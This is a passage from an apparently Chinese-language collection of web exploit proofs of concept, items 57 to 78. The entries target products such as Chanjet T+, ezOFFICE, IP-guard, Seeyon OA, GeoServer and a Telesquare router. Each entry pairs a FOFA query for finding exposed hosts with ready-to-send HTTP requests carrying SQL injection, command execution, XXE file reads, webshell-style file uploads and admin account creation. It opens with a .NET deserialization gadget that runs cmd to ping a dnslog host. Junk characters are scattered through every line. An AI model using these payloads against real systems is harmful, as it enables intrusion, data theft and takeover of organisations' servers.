' x/ U# _ G. G8 @. r+ h+ N "storeID":{
8 T L, {9 G5 Q7 F. _7 A$ u( h" ? "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
1 ~" L! C& a) p( O+ H "MethodName":"Start",
3 Y/ |5 B |8 ? "ObjectInstance":{
% q# d% Q: G. {: N5 ] M "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
* P( P5 C) \# F W1 i2 _8 {* P8 v "StartInfo": {
1 H+ D: u# P l# E "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
0 I! q: }: ~- g6 Z, f "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"9 ~* K9 i ~$ O+ u0 V
}
. `$ K( D9 T4 O7 W% j5 h' f }& A4 Y1 s2 n$ _3 O& r* }5 l7 \
}
: h( i" H$ _1 P}
, {$ @2 P5 b/ z, O# }! g; s7 U5 Y2 `$ J. R# Y
6 h8 d& A8 K' S1 `) c
57. 畅捷通T+ keyEdit.aspx SQL注入5 y5 Z+ X/ ^, o1 Y
FOFA:app="畅捷通-TPlus"2 b0 } F; R& C
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
" X* \* m3 a5 N* g7 l3 q6 dHost: host
6 Z' r' X. x4 b. D5 y( _! ]User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
9 ~: s o7 f2 Q) h. `9 ?Accept-Charset: utf-8; {6 F' ]. K% ~* ~- r) r
Accept-Encoding: gzip, deflate$ j& q( i3 h4 \* ], b
Connection: close
4 U; x- l5 q/ d" i% {/ I+ p1 X9 W
/ [5 z/ E L K; O" M0 R1 s
3 s. q* u, w9 ?8 O58. 畅捷通T+ KeyInfoList.aspx sql注入
2 D9 H* ~* U% qFOFA:app="畅捷通-TPlus"
( O5 A) k1 N5 uGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.13 T5 G$ l- y* B* J k. g
Host: your-ip
; E+ q- R1 y& }+ c# P+ dUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
6 U8 S( u( w3 Y# } R0 x8 r$ aAccept-Charset: utf-8& I) I" ]1 {+ Y2 W* n# j% s
Accept-Encoding: gzip, deflate/ Y# q( j3 Z' d* w. Q) M4 t
Connection: close
! e& n* q# V! d; Q
9 Z4 J; }4 y) v- o
3 Y5 X5 p/ d) {4 p59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
% m& A0 i4 {! x$ S3 oFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
" Y2 P; @( F) aPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1( `& [9 \" F* Y
Host: 192.168.86.128:9090, Z- T" B# G( j7 e
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
- N6 E4 @& U8 J; U' hConnection: close, g; f, k% P5 D, T* P/ R& p
Content-Length: 1669
+ L6 I0 j( z- @! R. LAccept: */*
* z/ X" u6 |! L4 A$ w% O8 G4 F1 H/ kAccept-Language: en$ @9 g# z8 K8 T, I
Content-Type: application/x-www-form-urlencoded
3 Q- i* t6 {! SAccept-Encoding: gzip8 p) k3 W5 X& g8 A6 e: o- B( c
3 ^, y2 F7 d' ~, B/ kPAYLOAD& [0 d/ W" X; {5 k$ j$ I
2 N. Q( Y5 J# a
0 |! O. t8 \/ g: z& i* m, G* \8 C60. 百卓Smart管理平台 importexport.php SQL注入0 z6 l6 g0 r+ N, O) `) {
FOFA:title="Smart管理平台"
2 y6 e1 a3 a! Y7 z4 {& x9 mGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1" y3 Y4 W* w: r, ^* N' e
Host:
3 v P7 G3 ?1 |' k( S5 z8 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 Z$ d8 |1 X1 q% |4 Z. R# yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 g7 e& |9 B8 \9 g9 d- G1 Z3 zAccept-Encoding: gzip, deflate8 `' T3 e* S9 |' f
Accept-Language: zh-CN,zh;q=0.9: n J n# K3 o; u8 f+ n* v) J# @
Connection: close
) |1 i3 T+ N" y" o
! F, D; F f% D! i/ p. P4 y6 z$ j9 r
$ k4 @5 j2 [( c b61. 浙大恩特客户资源管理系统 fileupload 任意文件上传% D& I6 l) v! [. I" b1 _
FOFA: title="欢迎使用浙大恩特客户资源管理系统"& a# D! D# U$ R% j! m
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
& C+ \6 X5 j! }Host: x.x.x.x$ s+ R: k. `1 Z, F3 g; p1 D0 U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. U! e- l1 Y1 m, N1 bConnection: close/ l4 g# r2 t1 m
Content-Length: 27# ^6 s! ?* c! z( E, C( m
Accept: */*
8 G# Q" @$ }% B% o$ B0 ?7 y; G3 TAccept-Encoding: gzip, deflate
z H# X. K7 MAccept-Language: en8 T) l% ]+ l+ ~% S: A) u
Content-Type: application/x-www-form-urlencoded
1 _9 o2 i# Z1 L0 C2 I. v
" Y& u5 f' W& W4 K- C8uxssX66eqrqtKObcVa0kid98xa* W& v* Z% F& w# ~! i1 _# W
! _& h! r6 X& X* R+ f6 }. L
- V; X( Z" I& [: J! {62. IP-guard WebServer 远程命令执行9 j" N% X# |. U+ F
FOFA:"IP-guard" && icon_hash="2030860561"
) v( A/ Z- F9 `GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
9 ^. y" a9 ?' sHost: x.x.x.x* Q8 @/ {! h. \: R
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
4 C9 L- K1 l( l2 g5 c' S' KConnection: close4 J% ~; k& `! D6 |* _) q
Accept: */*
( C9 ~% v A0 v. pAccept-Language: en
) w4 ^+ ?4 \4 f& \) t; _9 EAccept-Encoding: gzip; N- y! A5 \( R8 {
) d# ]; k( M! x
, m. [, G$ r, r( N5 U. R6 O访问- t) y* Q0 i* u7 Z: l! ]
/ {, o5 v9 b( ^$ RGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
) C+ P: e( Q! I `Host: x.x.x.x6 v' r0 r! [0 o
) J1 I) y0 m9 b4 m4 D6 P) Q; J) H* Q6 O$ ~* D% N/ T$ D
63. IP-guard WebServer任意文件读取" M" A7 R5 @( j7 i
IP-guard < 4.82.0609.0
" k; ?9 s5 r/ RFOFA:icon_hash="2030860561"
: Y) `1 k3 m/ v' KPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
- [' F$ D' d1 s3 Z2 sHost: your-ip
" p$ X# b' F: E9 V5 T# M- VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
! y' ~3 n. e; m8 A! `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# m/ T7 `0 V4 t, f, e9 tAccept-Encoding: gzip, deflate1 o- f) m# y2 E( q
Accept-Language: zh-CN,zh;q=0.9, x( E! V1 S* Y; ]9 D% I
Connection: close
4 A- X% U8 _' [' p* ~. t9 LContent-Type: application/x-www-form-urlencoded/ o$ S, l8 }+ U
' z& y/ a+ Q& y# z+ y" p2 R; q
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A+ |$ ?5 r% b+ t: \
- j" Z I1 J, Y" K; {6 O+ O8 G; q64. 捷诚管理信息系统CWSFinanceCommon SQL注入$ n# W- h/ d$ R' Q% g5 S1 C w7 V
FOFA:body="/Scripts/EnjoyMsg.js"7 z9 _! v: q6 D$ \( i) d2 ?. o1 v
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
5 d' ~: @5 O0 P- qHost: 192.168.86.128:9001
6 Y" a. X4 c- I2 j3 V: f QUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
4 z6 }& F& s! @& e* n' h8 v* iConnection: close
% Y( h S/ X5 j+ BContent-Length: 369' ^/ O6 L& l/ Q+ @( C/ z
Accept: */*
& U$ r a8 v" i qAccept-Language: en
4 b4 J$ H; Q3 x3 K; a8 cContent-Type: text/xml; charset=utf-8
5 j9 w5 B1 o- [2 gAccept-Encoding: gzip, \% b7 r* P5 B: I! V2 j
! U' d. c4 [1 ?) q" C
<?xml version="1.0" encoding="utf-8"?>" p, `8 u6 Y6 N; X, w
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">3 B; S( i9 F+ U% C/ J% }- k
<soap:Body>
/ J- t. V+ K. H4 F: V2 i <GetOSpById xmlns="http://tempuri.org/">: ]7 ]; f$ G5 w: |- T6 B
<sId>1';waitfor delay '0:0:5'--+</sId>$ D9 N1 o1 Z( l7 u
</GetOSpById>
1 D, }5 m6 u8 N4 x </soap:Body>
- Z7 r. p0 b; a" M</soap:Envelope>5 `! L2 a2 O0 Y
8 j6 a# Q9 a1 a2 f
2 t( D9 C* k/ ~9 s3 u$ t65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过( ` j- P0 ^) _7 U2 l
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"9 j, {* N% G/ o6 W; O
响应200即成功创建账号test123456/1234561 ?( H u- x$ r$ ?6 b
POST /SystemMng.ashx HTTP/1.1
$ K. d1 r8 D mHost:
& ] l* E2 Q }' k9 @5 U8 ]" kUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)* S n* b* J4 @. c, l4 _6 Z1 l6 d0 @
Accept-Encoding: gzip, deflate5 `6 d( W; H5 E, x0 @
Accept: */*+ v' J. }8 k' C0 G. {
Connection: close7 A2 N4 c( s# _2 u C; u0 b) N
Accept-Language: en
- x5 R, O0 y3 y2 yContent-Length: 174
7 |4 T; k% U) J4 \9 E m. j4 ^: ?9 w- R/ F
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators5 g [; l7 ^+ ~
9 Q& Y# P/ p: E, k; @
: I' O& c+ B3 `/ z4 H4 w0 m66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入0 C: u) h2 p2 h/ F
FOFA:app="万户ezOFFICE协同管理平台": q+ X8 Y; e, i; D% a
/ U1 X+ m3 Q# K' }! PGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.10 [7 z" \$ ~6 Q* u/ \
Host: x.x.x.x# h' y9 a% e" c. W; K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36- p: Z {( A" l# _
Connection: close
6 ^- A, b' A$ q4 O7 e4 _" K9 f iAccept: */*
, C4 Z: S. |6 F% ^/ M3 T* K/ jAccept-Language: en4 ~& _" B7 e, x$ z% d) @2 ^1 @2 X
Accept-Encoding: gzip
4 o2 q$ ^' A% o- {3 S5 U( _
, W2 n$ b( m3 C! X
, h1 z ~8 W+ l5 B第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在; w0 q; y$ X u2 d7 ^8 @* X/ k
+ C( R. b- I& |7 C n
67. 万户ezOFFICE wpsservlet任意文件上传$ h7 v; ?9 `( c' O( D
FOFA:app="万户网络-ezOFFICE"
% V2 Z. ^2 `& A) snewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
' q9 t! N; y, v) o( B8 A; i I e2 g5 JPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1" u0 V A B% G2 i/ c B$ H
Host: x.x.x.x
6 {* T& g [! W0 ]5 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
6 K& r2 _8 r. j: I* c: BContent-Length: 1734 u, w& n8 ~% i) e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8- r% ]0 I4 ]1 T# ^! C
Accept-Encoding: gzip, deflate
4 p3 i$ q2 E' j- W; oAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
) e0 B% M- E% I. G8 TConnection: close+ l7 `4 n! L# p9 v! n" s
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp9 {" B+ y8 @' u8 r
DNT: 11 d/ ~, o+ ^* D0 J$ X+ z) X- N
Upgrade-Insecure-Requests: 1
( Q8 y7 @ o# S2 |( K/ t/ x+ w% Y+ j% ~1 P; i3 h% P' |1 v# A
--ufuadpxathqvxfqnuyuqaozvseiueerp& ]1 p' P# H S$ z4 Z+ h- {$ P
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"+ U& n( G1 J) \" {
+ d6 V7 a+ Y0 d' k2 m8 m, s
<% out.print("sasdfghjkj");%>% ~* _$ B9 \5 P% Z
--ufuadpxathqvxfqnuyuqaozvseiueerp--
/ \( ?. d/ R. |0 ^: K e0 N z$ k% q2 U: l7 h+ S
4 q. G& u9 r( o; t. i
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp! u! ^7 T" ^9 V4 B: |+ \4 z
/ Q# j) M. _: F) C4 \68. 万户ezOFFICE wf_printnum.jsp SQL注入, R7 S' R/ E1 K' S
FOFA:app="万户ezOFFICE协同管理平台"
, t4 ^% Y! o' O4 w7 TGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 a5 B* D" c7 y, @/ M
Host: {{host}}
! ^2 ]( Y8 ^: [, XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
' i/ C( X; F4 u' z# K# _Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8- q4 ~4 |4 X+ i" Q" S4 C
Accept-Encoding: gzip, deflate
- \7 ]; }7 ]% d( lAccept-Language: zh-CN,zh;q=0.9% ]6 [; P; x# S( Z+ ]
Connection: close
) `7 g1 I3 p: B% j1 O3 p. o* X* U8 U+ D# a
3 k: V9 Q5 K4 e& D
69. 万户 ezOFFICE contract_gd.jsp SQL注入, C% @; _2 W0 |
FOFA:app="万户ezOFFICE协同管理平台"
u9 C5 v0 h# k9 f- v# S+ tGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
4 l' A0 L' X: ` ~9 bHost: your-ip8 l# P( V# y- z- F
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
! d( Z/ |, c% p1 K# U; c2 ?# PAccept-Encoding: gzip, deflate+ _& e2 d3 a' U1 r' ~; G
Accept: */*! c6 f# g3 Q* [7 D% V
Connection: keep-alive, s2 @+ j$ R# D
+ A/ u% y. p( p6 y
9 Z& s* P. u; |- a$ r# p, i" J& E70. 万户ezEIP success 命令执行
/ C- p+ M) {, Z2 Z+ eFOFA:app="万户网络-ezEIP"4 P/ Q, @) `7 j0 q( [/ W9 S( Z6 G
POST /member/success.aspx HTTP/1.1, n3 `$ H, _* _4 J% }# X7 u- K R7 K
Host: {{Hostname}}! O' b$ u; o( N" E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
4 K% ?; S7 C! |8 U8 H) wSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=- Y, \$ S I7 O7 R; L% F; V- h, q
Content-Type: application/x-www-form-urlencoded
- }! p' {9 e8 W5 x HTYPE: C% R& Q1 p4 R( k/ k7 ^: Z+ x
Content-Length: 16702
" t& G7 W1 T* s. x, h O9 r$ u1 L& ]. b: D% B6 S, o! e
__VIEWSTATE=PAYLOAD
2 O0 W; \, _- n( k* }8 V' j3 i4 Q% u: C g
1 L1 P$ {: B' }71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入) f, N! U7 ^" G& P5 G* {& v+ l
FOFA:body="PM2项目管理系统BS版增强工具.zip") V; B5 l/ p+ V4 @5 V
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1! U1 N& M) h D6 n
Host: x.x.x.xx.x.x.x
' D& z, o( b- P6 C. t9 ~& o8 LUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.362 G f9 t7 t! G5 h0 D2 A
Connection: close
& U0 I1 b' z# g0 B, TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, i0 t! B) f; w0 j- d4 |* dAccept-Encoding: gzip, deflate, ^/ a! b$ c% r( ~# R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 Q; Z% M9 j4 ?- t
Upgrade-Insecure-Requests: 1; T: r3 k8 f& J6 n
4 x9 y. v$ B _' M" _1 F! ]( J
6 D' F b2 d! {3 m# |& z& J) A4 K
72. 致远OA getAjaxDataServlet XXE
7 `6 q2 f% o) u" F; m9 R: q# BFOFA:app="致远互联-OA"
& T$ r9 \8 b9 FPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
, d7 T$ l+ a( I) a( XHost: 192.168.40.131:8099
$ J4 c3 h3 a& E4 T, }' ?User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
& f6 E% h( r9 v7 n# ~1 tConnection: close
2 v+ G% O# P! m0 F3 G6 _7 {) y0 yContent-Length: 583
+ b8 K: z, s. Y( UContent-Type: application/x-www-form-urlencoded' ^' A5 W* T" Y1 p! i: y8 A
Accept-Encoding: gzip
' K4 ^& `" @% X7 z0 p* i8 N3 S
8 @" X' U) \- C2 X! YS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
, Q! L- e5 A1 c9 ~9 p( Z* d2 `6 G
% b' F* V# R6 t& D$ D" y! Z, @0 W5 E4 P) l9 {! d- `
73. GeoServer wms远程代码执行' Q1 ?- s3 w# l
FOFA:icon_hash=”97540678”
3 i7 i) v9 W8 A4 hPOST /geoserver/wms HTTP/1.1
5 m4 z; H& R! v0 ^Host:* \# {( ]$ Q7 m6 F0 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
& b2 a! x. }1 O7 LContent-Length: 1981
( ]( t/ |+ _, nAccept-Encoding: gzip, deflate' L4 [& A# j- z: {5 C4 j. [% I
Connection: close0 g( b! L) E6 I4 Y2 M7 U# O
Content-Type: application/xml
" x& w) l2 [; v2 NSL-CE-SUID: 3
; K% @5 r1 l. V; `+ ^# Y0 e
$ l. t( u7 d& e: d- Y rPAYLOAD0 L5 |/ b9 X. d1 z. b
7 }- Z, `6 E4 q; u5 a
0 K# v+ }/ @" p$ q: P7 Y
74. 致远M3-server 6_1sp1 反序列化RCE) _: J$ T( P8 p
FOFA:title="M3-Server"1 u5 v' q0 n7 d+ k3 @3 I& e% t
PAYLOAD
8 ^; A+ J% W4 i/ P! }6 b1 `5 J- y3 F7 n' @
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
5 l+ N, y! @0 g9 L; L+ D Z" A2 HFOFA:app="TELESQUARE-TLR-2005KSH"
4 @) G! f) Z& J% Z( O3 nGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1. s, ^' K9 z- I: e; p! B( f
Host: x.x.x.x0 p& i$ _5 q& @; ^! i' A" |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 g8 M' ?9 F% z/ W$ n; S
Connection: close
2 W% h6 I) i+ [% J( y' BAccept: */*
: r9 R; v/ w+ |2 G+ x- tAccept-Language: en1 r4 n0 V+ ^ L! G" l* U
Accept-Encoding: gzip
, P" A' ?5 H5 `# W2 i0 y: W
) U6 ~' V$ N2 _5 s; q% U$ p: w8 Z( e5 X8 r' c( b
GET /cgi-bin/test28256.txt HTTP/1.14 O3 c- H4 E: w. d" B
Host: x.x.x.x: W: Z. k3 r) D6 T) ^
: t( a1 Q, G! G$ X$ C+ o0 Z9 h, Q7 {$ j. v- Z8 T
76. 新开普掌上校园服务管理平台service.action远程命令执行
* E, ~7 s& ~# E. \3 e/ d5 M2 d2 }FOFA:title="掌上校园服务管理平台"
+ F; Z _7 q: C0 ] R& OPOST /service_transport/service.action HTTP/1.1
3 a7 q4 z+ v6 |- ?7 xHost: x.x.x.x& h1 J4 O/ u! K4 [7 H: j3 q! r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
8 R2 F4 C7 `! i9 H+ KConnection: close _1 e9 l9 V0 e* R$ t& \
Content-Length: 211
. B: C# y$ y, W. W5 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ }2 w: O; Q" l
Accept-Encoding: gzip, deflate* T' S" V8 |9 {- N3 w* Q0 u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& D! V& q( |. B7 K1 xCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
- \* S; E4 }7 O1 O' _Upgrade-Insecure-Requests: 1* m% O l7 k# c' t
6 ^7 [% C. l1 Y3 C7 Q, ^) i
{ k# ]# ?- _6 W# e6 R
"command": "GetFZinfo",
% Y. t& k/ D" ~! f+ O3 h+ I "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"' y' @( W# f+ ?* C! o% C& ]$ F8 ^
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
+ X0 E3 z" A, Y}: J3 I% Q% Q( n4 k8 C, b+ i+ B
3 z0 v7 k) g* u6 M
; y5 @: K1 m6 R
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
# |: Z6 V* z$ D0 q8 AHost: x.x.x.x
; ~+ H' W8 |" d$ x4 I
2 C; [- \. |+ A6 ]6 [( m1 l6 h2 `
: C4 r g Q! U7 @- {, w9 |9 ~* O. [ y; b! x
77. F22服装管理软件系统UploadHandler.ashx任意文件上传0 a1 W G: K7 a3 b
FOFA:body="F22WEB登陆"5 y' s* ?* ]( u! Z/ W
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
/ }( i6 X1 {* Y9 B0 r) W9 U( @Host: x.x.x.x0 `9 v" V H4 C8 g% r) T* Y, y3 h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 V4 Y/ M% s! @0 M, ?- G
Connection: close
6 ^, q- R* z0 \7 D- t4 V; G" LContent-Length: 4334 j4 b) E% ?3 @$ m
Accept: */*% U' V: t! a6 t+ O
Accept-Encoding: gzip, deflate
! J! ^1 w. @. l6 iAccept-Language: zh-CN,zh;q=0.9, B! K# `: O; N, E: P3 u I; x: k
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix5 @6 X/ Q. @. k! }. t
7 u# p# z' w! Y3 i$ X) w------------398jnjVTTlDVXHlE7yYnfwBoix. X8 h4 G) {0 ]3 W$ P: [
Content-Disposition: form-data; name="folder"7 P/ X( T0 [- _! m& N1 A1 d( c
; C- p1 u# e" R ?; _5 v" ^; S/ I
/upload/udplog
& H, ]% k* B* ]# u) G------------398jnjVTTlDVXHlE7yYnfwBoix7 B; Y% w8 \1 l8 `6 R. x0 H# B
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"1 p5 y5 f+ m% W0 ~4 v& i% K/ g [
Content-Type: application/octet-stream
, ^% T; }7 |: a+ ?& Q: G2 M$ z' y/ C6 ^ \
hello1234567
# \6 K/ p. f0 D" }3 n9 n/ N9 c------------398jnjVTTlDVXHlE7yYnfwBoix5 _% Z# h) C% G2 c' k- Q9 m# w5 \' e% V
Content-Disposition: form-data; name="Upload"
; `; I, L! K: x
, R2 M$ q2 n5 I5 i, c. `Submit Query' q2 e5 L1 \( d: s
------------398jnjVTTlDVXHlE7yYnfwBoix--7 v4 I' v4 @/ L i. A
8 a$ L; @7 C# {! q3 L. Q! u
+ D4 m, b7 s0 J' M2 n* f78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
/ D# k3 D, z1 k1 F9 h/ e& ZFOFA:icon_hash="2001627082"& C% k0 B9 H, X9 g1 ?( }( M7 Z$ _+ O
POST /Platform/System/FileUpload.ashx HTTP/1.1( y7 z) H5 }' o; I. g
Host: x.x.x.x6 e g% |. }) z; M& T+ i" r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* }: C. c4 j" p2 h7 c. L1 M' pConnection: close
K V' Q1 h# w5 l) ~. c* O& FContent-Length: 336$ J ]. P3 `8 S3 O" C9 Z9 j+ s5 x
Accept-Encoding: gzip
! s1 l% X: B* w! U/ ?Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
& C' Z# C" k1 Y% r! T; L! V5 e* a
7 z: i3 I7 N, p8 ]% D------YsOxWxSvj1KyZow1PTsh98fdu6l( X3 t1 q6 `! ~6 T" \5 _' ~
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"! n6 T2 G- C! W* J" l
Content-Type: image/png3 i& z1 L) e+ {+ [9 \; ]7 N
" l2 K% v4 i- z9 s `( I/ @YsOxWxSvj1KyZow1PTsh98fdu6l
# _: o3 M+ C+ r6 ~' m1 o------YsOxWxSvj1KyZow1PTsh98fdu6l
e: P) |- _2 c O" f* ]Content-Disposition: form-data; name="target"
4 A2 T" a! p. {# h0 m$ V! S+ q3 Y! [7 X& `3 C1 Z: D& ^
/Applications/SkillDevelopAndEHS/: b, S" g: D- @' w! ?
------YsOxWxSvj1KyZow1PTsh98fdu6l--. m0 I( i! m! b% u' f/ I
5 U M8 p5 K; s# r, L& F T# S* S+ k5 e9 c7 r' K- S! [
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
